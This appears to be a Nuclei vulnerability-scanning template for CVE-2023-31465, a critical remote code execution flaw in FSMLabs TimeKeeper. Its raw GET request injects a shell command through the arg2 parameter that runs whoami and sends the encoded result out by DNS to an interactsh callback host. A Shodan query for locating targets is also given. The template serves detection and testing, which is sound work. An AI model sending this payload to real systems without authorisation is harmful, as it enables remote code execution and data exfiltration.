id: CVE-2023-31465 info: name: TimeKeeper by FSMLabs - Remote Code Execution author: ritikchaddha severity: critical description: | An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server. reference: - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md - https://nvd.nist.gov/vuln/detail/CVE-2023-31465 - https://fsmlabs.com/fsmlabs-cybersecurity/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31465 epss-score: 0.00841 epss-percentile: 0.80144 cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fsmlabs product: timekeeper shodan-query: http.favicon.hash:2134367771 tags: cve,cve2023,timekeeper,rce,oast,fsmlabs http: - raw: - | GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - dns - type: word part: body words: - '{"seriesID":' # digest: 490a0046304402200133679d7d95e5c9e0278e811d9f54b9ec3f80a5d600427a34b162709b0656a902206ed286ccfbcb931a5feff1505b414835e76d7baf362b79bd2764292c4f2278ca:922c64590222798bb761d5b6d8e72950